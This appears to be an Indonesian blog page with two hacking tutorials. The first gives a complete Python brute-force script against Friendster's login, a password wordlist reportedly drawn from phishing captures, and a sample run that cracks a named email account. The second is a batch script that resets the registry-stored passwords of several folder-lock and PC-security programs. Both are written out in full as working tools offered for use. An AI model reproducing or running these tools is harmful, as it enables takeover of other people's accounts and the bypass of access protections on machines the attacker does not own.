Tutorial Hacking Password Friendster 2009 by Kurniawan (yogyafree.net)

Dikatakan Tutorial Hacking Password Friendster 2009 karena saat ini Teknik overlay dan Cookie Stealing. Tapi serangan brute force dictionary masih dapat di lakukan.

Pertama-tama anda harus mempunyai program Python versi baru (versi lama tidak jalan), bisa menggunakan Python versi windows. Dapat didownload : http://www.python.org/ftp/python/2.6.1/python-2.6.1.msi

Setelah selesai download, maka install python tersebut ke harddisk (c:\python26). download file pass.rar atau ambil dari sourcenya sudah disertakan di tutorial ini. Untuk file pass.rar dapat diambil di http://www.yogyafree.net/pass.rar setelah didownload maka dapat di extract ke c:\python26. lalu jalankan perintah dibawah ini di cmd (c:\python26) :

Python hackfs.py (e-mail target) words.txt -v

jika anda beruntung, maka anda mendapatkan passwordnya.

Isi file words.txt ini dikumpulkan oleh penulis dari password-password yang sering digunakan para pengguna fs di Indonesia (yogyafree.net/familycode/friendster.txt)

Source code hackfs.py :

Quote:
#!/usr/bin/python
#Friendster.com Login BruteForcer

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import urllib2, sys, re, urllib, httplib, socket

print "\n d3hydr8[at]gmail[dot]com friendsterBF v1.1"
print " Modifikasi bahasa dan informasi penggunaan oleh kurniawan"
print " ---------------------------------------------------------"

if len(sys.argv) not in [3,4,5,6]:
print "Penggunaan ketik: python fshack.py "
print "Contoh: python fshack.py kurniawan@yahoo.com words.txt -v\n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)

for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1

try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass

try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass

host = "http://www.friendster.com/login.php"
print "[+] BruteForcing:",host
print "[+] Email:",sys.argv[1]

try:
words = open(sys.argv[2], "r").readlines()
print "[+] Jumlah kata password :",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)

for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('_submitted', '1'),
('next', '/'),
('tzoffset', '240'),
('email', sys.argv[1]),
('password', word),
('remembermyemail', 'on'),
('btnLogIn', 'Log In'),
('btnSignUp','Sign Up')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass

if re.search("The email address you entered is not a valid Friendster login.",site):
print "\nThe email address you entered is not a valid Friendster login.\n"
sys.exit(1)

if re.search("The email address and password you entered did not match.",site) == None:
print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
sys.exit(1)
else:
if verbose == 1:
print "[-] Kata Password yang diperiksa :",word
print "\n[-] Brute Complete\n"

Simpan di file fshack.py

words.txt

Quote:
CAYANG
password
superman
123456
1234567
merah
november
thunder
testing123
doremi
kampus
morning
metal
sayang
bintang
remaja
flower
sayangku
CINTA7
bekasi
abcdefgh
0123654789
BATMAN
starmild
newnokia
master
tiramisu
dokter
srigala
muhammad
sayangkuw
FOREVER
inlove
nokia
abc123
fuckme
fucking
keparat
monkey
1234567890
coklat
123456789
bismillah
bandung
ketawa
spiderman
kereta
iloveu
muslim
yayang
cintaku
juventus
terminator
love69
kacamata
samurai
penjahat
slipknot
asshole
anjink
123123
bullshit
140104
mahadewi
butterfly
asdfgh123
12345
cuantik
cayangsmua
abccab
purwodadi
abcde
abcdef
jakarta
jakartaku
naruto
binalbinal
cintaq
wanita
serius
abcdefgh
lolipop
friendship
jelekjelek
jomblo
12345678
ganteng
gejayan
superman
songoku
someone
112233
kungfu
guabanget
server
private
monyet
honey
sweety
lavender
suparman
takutku
medan
samsung
amit-amit-you
doraemon
playboy
trisakti
pancasila
gemini
balonku
kulkas
mawarmerah
password8
lesbian
hitman
cintaiaku
percayalah
rindukamu
anakkadal
nobita
jakartaku
serangan
kledokan
sepuluh
duapuluh
lelaki
kentang
ayambakar
789789
cocote
ashiteru
akucantik
campus
indonesia
jablai
kamikaze
samuraix
pandai
agustus
maniest
bungaku
kucing
sarung
januari
november
batik
satwa
kupang
loyalitas
kotagede
laruku
internet
brebes
punkers
pekanbaru
donalbebek
cocacola
pujangga
spongebob
surabaya
simpati
indocafe
secret
soulmate
perbanas
detektif
girly
flowers
sweet
mahameru
laluna
bahasa
green
kingston
astaganaga
jeruk
selimut
sweets
alwaysluv
chelsea
italia
supermanis
hanie
baladewa
kacang
keripik
hitamputih
bismillah
anakayam
sembilan
tampan
cintaa
bmw
kompas
aquarius
cantiq
cayangku
marlboro
sejahtera
imutz
palembang
kalimantan
family
kingkong
lumpia
cantik
desember
SEPTEMBER
djogja
bismilahku
orgasme
blank
pazzword
oktober
sulawesi

Simpan jadi file words.txt

Hasil :
C:\Python26>python fshack.py fskuwww@yahoo.com words.txt -v

d3hydr8[at]gmail[dot]com friendsterBF v1.1
Modifikasi bahasa dan informasi penggunaan oleh kurniawan
---------------------------------------------------------

[-] Proxy Not Given
[+] Verbose Mode On

[+] BruteForcing: http://www.friendster.com/login.php
[+] Email: fskuwww@yahoo.com
[+] Jumlah kata password : 216

[-] Kata Password yang diperiksa : CAYANG
[-] Kata Password yang diperiksa : password
[-] Kata Password yang diperiksa : superman
[-] Kata Password yang diperiksa : 123456
[-] Kata Password yang diperiksa : 1234567
[-] Kata Password yang diperiksa : merah
[-] Kata Password yang diperiksa : november
[-] Kata Password yang diperiksa : thunder

[!] Login Successfull: fskuwww@yahoo.com doremi


C:\Python26>

UPDATE

Words FamilyCode Dictionary II for FS Pass Attack :
http://www.yogyafree.net/pass3.rar

1065 Words ini dikumpulkan oleh Kurniawan (yogyafree.net) dengan sumber kumpulan password FS dari fakelogin dahulu (Indo user)
Mayoritas Words merupakan password yang paling umum digunakan pengguna friendster di Indonesia
1065 Words dibuat dari 50.000 lebih baris password FS dari berbagai sumber

By Kurniawan (yogyafree.net)

Membuat Script Indonesia Jaya Tembus Password

Membuat Script Indonesia Jaya Tembus Password

Oleh lovepassword
Published: Februari 24, 2009
Updated: Februari 25, 2009
Print   
Selamat malam saudara sebangsa dan setanah, selamat berjumpa lagi dengan saya lovepassword dengan sari berita tidak penting.

Halo..Halo....

Pada kesempatan kali ini, saya mencoba berbagi script ( kayaknya mendingan berbagi angpau lebih enak deh. Hi Hi Hi)

Tujuan Script ini adalah untuk mereset password berbagai program security populer. Script ini tentu saja bisa dikembangkan lebih lanjut menjadi script yang lebih banyak - atau menjadi program beneran. Tapi kali ini cukup yang bohong2 an saja ya


================================

Script atau program mini imut2 ini saya namakan INATAPA, singkatan dari Indonesia Jaya Tembus Password. Mengapa namanya begicu ?

Karena script ini akan mengubah password dari program-program yang anda lupa/tidak tahu passwordnya - akan diubah menjadi password resetnya yaitu Indonesia Jaya.

Mengapa passwordnya harus "Indonesia Jaya"?
Nggak ada alasan khusus sih. Kadang tidak semua program mau menerima password kosong, sehingga mendingan dibuat ada saja.








Scriptnya bisa dibuat dengan Notepad,

Cuplikan scriptnya seperti di bawah ini :




@echo off

Title INATAPA v01 - 2008
echo.
echo INATAPA v01 : Indonesia Jaya Tembus Password versi 01
echo ---------------------------------------------------------------------------
echo Script Kecil untuk membuka file konfigurasi berbagai Program Security
echo.
echo Oleh : Lovepassword - www.lovepassword.blogspot.com
echo Kredit : TopengDigital - www.topengdigital.com
echo.
echo Program ini bebas dicopy serta dimodifikasi oleh siapapun
echo.

:PILIHAN
echo.
echo Silakan pilih Program yang ingin anda buka file konfigurasinya
echo ---------------------------------------------------------------------------
echo.
echo 0. Regedit Standard
echo 1. PC Security (dicoba dengan versi 6.4 ) - www.tropsoft.com
echo 2. FolderGuard (dicoba dengan versi 7.91) - www.winability.com
echo 3. MySecretFolderXP (dicoba dengan versi 4.31) - www.winability.com
echo 4. Hide File and Folder (dicoba dengan versi 3.1 ) - www.softstack.com
echo 5. Folder Lock (dicoba dengan versi 5.90) - www.newsoftwares.net
echo 6. Hide Folder (dicoba dengan versi 3.1 ) - www.hide-folder.com
echo 7. EasyFile nF Protector(dicoba dengan versi 3.9 ) - www.softstack.com
echo 8. Winboost (dicoba dengan versi 4.9 ) - www.winboost.com
echo 9. USB Lock (dicoba dengan versi 2.5 ) - www.advansysperu.com
echo 10. - Keluar dari Program ini
echo 91. - Sikat Semua Program yang terdaftar
echo.
echo Dalam banyak kasus - versi program biasanya tidak ada pengaruhnya.
echo ----------------------------------------------------------------------------
Set /P pilih= Pilih Nomor program :
cls
For %%a In (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 91) Do if "%pilih%"=="%%a" Goto Pilihan_%%a
echo.
echo Salah Input ! Pilihan 0 sd 9 untuk memilih program
echo.
echo Atau pilih 10 untuk keluar atau 91 untuk memilih semua program
echo.
echo Tekan Sembarang Tombol untuk kembali
pause>NUL
cls
Goto PILIHAN



:Pilihan_0
echo 0. Anda memilih membuka proteksi Regedit
echo -----------------------------------------------------------------
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 0 /f

echo.
if Not "%Pilih%" == "91" (
echo.
pause
cls
Goto PILIHAN )


:Pilihan_1
echo 1. Anda memilih masuk file konfigurasi PC Security
echo -----------------------------------------------------------------
echo.
if exist %temp%_PCSecurity.reg del %temp%_PCSecurity.reg
Start /wait REGEDIT /E %temp%_PCSecurity.reg "HKEY_LOCAL_MACHINESOFTWAREMicrosoft rsys"
if not exist %temp%_PCSecurity.reg echo Registry PC Security tidak ditemukan
echo.
if not exist %windir%dwpces23.dru echo File Password PC Security tidak ditemukan
echo.

if exist %windir%dwpces23.dru (
echo File Password PC Security ditemukan, Password akan dibackup dan direset
copy %windir%dwpces23.dru %temp%dwpces23.dru
del %windir%dwpces23.dru
echo.)

if exist %temp%_PCSecurity.reg (
echo Registry PC Security ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp%obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoft rsyscopp] >> %Temp%obol.reg
Echo "s"=hex:56,11,ad,21,7b,08,bc,1b,6e,c3,93,13,86,04,49,b2,0d,a3,49,b2,60,e8,8c, >>%Temp%obol.reg
Echo 07,5f,ec,9d,0b,0d,a3,49,b2,0d,a3,49,b2,0d,a3,49,b2,60,e8,8c,07,5f,ec,9d,0b, >>%Temp%obol.reg
echo 0d,a3,49,b2,0d,a3,49,b2,0d,a3,49,b2 >>%Temp%obol.reg
Start /w REGEDIT /S "%temp%obol.reg"
del %Temp%obol.reg
echo.
echo * Untuk masuk PC Security, Masukkan Password : Indonesia Jaya)

echo.
if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)


:Pilihan_2
echo 2. Anda memilih masuk file konfigurasi FolderGuard
echo -----------------------------------------------------------------
echo.
if exist %temp%_FolderGuard.reg del %temp%_Folderguard.reg
Start /wait REGEDIT /E %temp%_FolderGuard.reg "HKEY_LOCAL_MACHINESOFTWAREWinabilityFGD"

if exist %temp%_FolderGuard.reg (
echo Registry Folderguard ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp%obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREWinAbilityFGD] >> %Temp%obol.reg
Echo "FGP"=hex:46,47,50,00,09,04,00,00,73,bc,00,00,00,00,00,00,00,00,00,00 >> %Temp%obol.reg
Start /w REGEDIT /S "%temp%obol.reg"
del %Temp%obol.reg
echo.
echo * Untuk masuk Folderguard, Masukkan Password : Indonesia Jaya)

if not exist %temp%_Folderguard.reg echo Registry FolderGuard tidak ditemukan
echo.

if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)

:Pilihan_3
echo 3. Anda memilih masuk file konfigurasi My Secret Folder XP
echo -----------------------------------------------------------------
echo.
if exist %temp%_MySecretFolder.reg del %temp%_MySecretFolder.reg
Start /wait REGEDIT /E %temp%_MySecretFolder.reg "HKEY_LOCAL_MACHINESOFTWAREWinabilityMySecretFolder"

if exist %temp%_MySecretFolder.reg (
echo Registry My Secret Folder XP ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp%obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREWinAbilityMySecretFolder] >> %Temp%obol.reg
Echo "AdminData"=hex:a9,47,dd,be,cf,04,ef,2e,f4,43,d8,0f,bd,ad,92,bb,18,5a,2e,5e >> %Temp%obol.reg
Start /w REGEDIT /S "%temp%obol.reg"
del %Temp%obol.reg
echo.
echo * Untuk masuk My Secret Folder XP, Masukkan Password : Indonesia Jaya)

if not exist %temp%_MySecretFolder.reg echo Registry My Secret Folder XP tidak ditemukan
echo.

if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)

DAN SETERUSNYA >>>

Daripada para teman pusing mengetik, silakan anda download saja scriptnya di sini.

http://www.ziddu.com/download/3624397/INATAPA.zip.html

Script tersebut sudah dilengkapi kemampuan membackup password aslinya. Hanya saja tidak ada fitur untuk mengembalikan password lama yang direset tadi. Mungkin akan saya buat sambungannya dengan script yang lain. SALAM Source : http://lovepassword.blogspot.com/2009/02/membuat-script-indonesia-jaya-tembus.html

ഫ്രീ ഹോസ്ടിന്ഗ് UNLIMITED

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.